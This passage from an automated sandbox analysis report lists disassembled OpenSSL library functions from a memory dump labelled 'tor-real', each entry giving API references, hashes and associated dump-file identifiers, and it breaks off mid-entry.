                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_pop_freeX509X509_freed2i_
                                                                            • String ID: 2
                                                                            • API String ID: 1007395192-450215437
                                                                            • Opcode ID: d607ba44870ebe324b02893ad89d21f6c2a2a773b09f9ce28ab664e622a3e2a2
                                                                            • Instruction ID: 6bab2bfcfbc60e11497c646993a2e10bdd84b7b7d19c273d7da05efaf6e6b748
                                                                            • Opcode Fuzzy Hash: d607ba44870ebe324b02893ad89d21f6c2a2a773b09f9ce28ab664e622a3e2a2
                                                                            • Instruction Fuzzy Hash: 38116DB16093128FD3049F65849136EFBE1FB86308F64892DD1A48BA41C776A1058B82
                                                                            Function 6C0CA9EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            • Opcode ID: 4fed300640524977cd58242a88ae7c42aa1860fcf11c3859a7ada9d230a608b0
                                                                            • Instruction ID: 8bc9c2a1d971cf56f4770a143127a6f07ba2e790682f6c7ca89e67cbacaa6d06
                                                                            • Opcode Fuzzy Hash: 4fed300640524977cd58242a88ae7c42aa1860fcf11c3859a7ada9d230a608b0
                                                                            • Instruction Fuzzy Hash: ED113A716053158FDB008F58C48839EBBE0BF88348F61891CE9A817740C37AD448DF57
                                                                            Function 6C092BA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /$ssl/d1_lib.c
                                                                            • API String ID: 0-2993022000
                                                                            • Opcode ID: 9caf25a5cb32b19c04b99fe890f98924260c824f447ec75063b45cfed9fe2fc4
                                                                            • Instruction ID: eee5b55de298a5f58bfde23fd68368a57b2a861edfa20e1551af6bc7448548a3
                                                                            • Opcode Fuzzy Hash: 9caf25a5cb32b19c04b99fe890f98924260c824f447ec75063b45cfed9fe2fc4
                                                                            • Instruction Fuzzy Hash: 29113AB01093069BD344DF25C88438EBBE1BB85318F54DA7CE4988BB85C73495899F82
                                                                            Function 6C0CA558 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: D
                                                                            • API String ID: 177401054-2746444292
                                                                            • Opcode ID: 65603799fa405fc512c01c99a3183921888baf3c21349fccb7b1ed6afd15dfc0
                                                                            • Instruction ID: 3d201f4393892792101718ef59ef0b1905b151d56aa3ba91b6f4743ea29e76b7
                                                                            • Opcode Fuzzy Hash: 65603799fa405fc512c01c99a3183921888baf3c21349fccb7b1ed6afd15dfc0
                                                                            • Instruction Fuzzy Hash: 23113AB16097158FD7008F58C48839EBBE0BF89358F618A1CE9A85B740C37AE449DF87
                                                                            Function 6C0CAC7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CABFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: D
                                                                            • API String ID: 177401054-2746444292
                                                                            • Opcode ID: 6652e3af4ddab9f67974c60f0bf991db0c022bef5dad64d9c0f068834ff59e40
                                                                            • Instruction ID: 39135b6cfb2707f484f409cf51c28975abef646e83a889c84fc25dffb3bc75b5
                                                                            • Opcode Fuzzy Hash: 6652e3af4ddab9f67974c60f0bf991db0c022bef5dad64d9c0f068834ff59e40
                                                                            • Instruction Fuzzy Hash: 810113B16097058FD7008F59C48479EBBE0BF89718F618A1CE9A85B680C37AD4488B87
                                                                            Function 6C0E2A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CONF_parse_list.LIBCRYPTO-1_1 ref: 6C0E2A86
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0E2ACC
                                                                              • Part of subcall function 6C0E28F0: CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E291B
                                                                              • Part of subcall function 6C0E28F0: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E2980
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: F_parse_listO_freeO_malloc__stack_chk_fail
                                                                            • String ID: :
                                                                            • API String ID: 202213309-336475711
                                                                            • Opcode ID: 614e2edee8cc935e14e1c495a16c639c503b92fb5afbe5b99a4f1c9efaf7b50d
                                                                            • Instruction ID: b060367c3a1dfe70a7eea7145a220b27b30054b7b0ff1689c3acbfbce3160fda
                                                                            • Opcode Fuzzy Hash: 614e2edee8cc935e14e1c495a16c639c503b92fb5afbe5b99a4f1c9efaf7b50d
                                                                            • Instruction Fuzzy Hash: 7F11F3716183558FE720DF25C58479BBBE4BF88308F05892DE8D897300D774A508CF92
                                                                            Function 6C0B8413 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_add_error_data.LIBCRYPTO-1_1 ref: 6C0B838F
                                                                              • Part of subcall function 6C0AC590: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5C1
                                                                              • Part of subcall function 6C0AC590: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5E0
                                                                              • Part of subcall function 6C0AC590: OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0AC5F3
                                                                              • Part of subcall function 6C0AC590: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC60B
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B843F
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0B8449
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$L_sk_pop_freeR_add_error_dataR_put_error__stack_chk_fail
                                                                            • String ID: H
                                                                            • API String ID: 1593245253-2852464175
                                                                            • Opcode ID: 5a1fa16e01c3be3459e996516ea236c62468145dd9df73944090db81f90540d0
                                                                            • Instruction ID: 4fd03ab0cde929a5be1cb8c1cc2af3a844bae200cf71d90751ad4b7c47c5f590
                                                                            • Opcode Fuzzy Hash: 5a1fa16e01c3be3459e996516ea236c62468145dd9df73944090db81f90540d0
                                                                            • Instruction Fuzzy Hash: 1201C0B5608301DFC310DFA8C08174EFBE0BB88719F108D1EE0D8A7A20D7B9E5488B86
                                                                            Function 6C0C2F57 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0C2F63
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_sizeO_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 95341914-307317852
                                                                            • Opcode ID: e9c71d90b40351983438706acd2e58c4c12eaf61d86f80c845f30096d7cfc977
                                                                            • Instruction ID: 66671bc5658649a30ab68000474983e34dc697f3a6760dc5e9a2b8657843e272
                                                                            • Opcode Fuzzy Hash: e9c71d90b40351983438706acd2e58c4c12eaf61d86f80c845f30096d7cfc977
                                                                            • Instruction Fuzzy Hash: 1301F2B02097019EE700AF25D58936FBBF0BB84708F10991DE5984BA40DBB994499B83
                                                                            Function 6C0A0663 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0680
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestR_put_errorUpdate
                                                                            • String ID: D$P
                                                                            • API String ID: 1495512078-307317852
                                                                            • Opcode ID: 6ab562742c5dc92f355c86829a847516a25cd8a6cb50b01614f4840e90ede6c4
                                                                            • Instruction ID: b8a2320f382d6780abf1d640b8791f4fd89afb6864e5090ce2be09da98b30e5c
                                                                            • Opcode Fuzzy Hash: 6ab562742c5dc92f355c86829a847516a25cd8a6cb50b01614f4840e90ede6c4
                                                                            • Instruction Fuzzy Hash: 27F0E2B160C7508FD340DFA8D48478BFBF0AB88358F85891EE9A997611D374E8498B82
                                                                            Function 6C0A4C24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4745
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A4C4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N1_item_freeR_put_error
                                                                            • String ID: g
                                                                            • API String ID: 4156053322-30677878
                                                                            • Opcode ID: b223fa1234dffaf0d316395b9d2a513d279ad1c4ceab3ed8635578a61eb83cd5
                                                                            • Instruction ID: 5c68988424162ce01300d867156b12e9e07fd6c57fd3de8625bcab9431b6dfdf
                                                                            • Opcode Fuzzy Hash: b223fa1234dffaf0d316395b9d2a513d279ad1c4ceab3ed8635578a61eb83cd5
                                                                            • Instruction Fuzzy Hash: FFF03AB6109341AFDB009FD5D48039EF7E0FF81708F01992DE5E81BA00C7B5A5498F96
                                                                            Function 6C0E0F53 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0ED1
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C0E0F83
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0FAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: CipherInit_exR_flagsX_ctrl
                                                                            • String ID: D
                                                                            • API String ID: 3413411502-2746444292
                                                                            • Opcode ID: cc67cc2f9e8c11d9bef6432798bbb551ae8396b492cb3aab0de73392d453c1d8
                                                                            • Instruction ID: 8d8447a508a755b1ce2b02eb02fce36a505fd18ee5cb831b353cc241b4ef7de3
                                                                            • Opcode Fuzzy Hash: cc67cc2f9e8c11d9bef6432798bbb551ae8396b492cb3aab0de73392d453c1d8
                                                                            • Instruction Fuzzy Hash: BF0188B05493019FE300CF28C18470ABBE0AB89308F008C1DE9A8A7740E779E9489F86
                                                                            Function 6C0C448B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0C4497
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0C44AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numL_sk_value
                                                                            • String ID: 2
                                                                            • API String ID: 557030205-450215437
                                                                            • Opcode ID: 39dbab7cf3ce6f667aca7f31557d4fecc17117418ab79dbc725185877c96c5ae
                                                                            • Instruction ID: 06a71238d609000556b576912921028831ce8937d91b49efc003204aa95052ef
                                                                            • Opcode Fuzzy Hash: 39dbab7cf3ce6f667aca7f31557d4fecc17117418ab79dbc725185877c96c5ae
                                                                            • Instruction Fuzzy Hash: 38F058B160A3019FD300AF60E54429EFBF1FB84719F22891EE48847711D7BAA488CF83
                                                                            Function 6C0A47AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4745
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A47D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N1_item_freeR_put_error
                                                                            • String ID: g
                                                                            • API String ID: 4156053322-30677878
                                                                            • Opcode ID: 9d88223f193ef0258e0a11be163f4a5ba3285d02da135cc836d32f064ded2f41
                                                                            • Instruction ID: 7ed151613fd288cdaa54b830f15a410bf2e6b677543172c16b50e0fbb5244c4b
                                                                            • Opcode Fuzzy Hash: 9d88223f193ef0258e0a11be163f4a5ba3285d02da135cc836d32f064ded2f41
                                                                            • Instruction Fuzzy Hash: ABF034B6109341AFDB10AFD5D48039EF7F0FF81708F01992DE5A81BA10C7B9A54A8F96
                                                                            Function 6C0CEE78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0CF08E
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CF0AE
                                                                            Strings
                                                                            Memory Dump Source
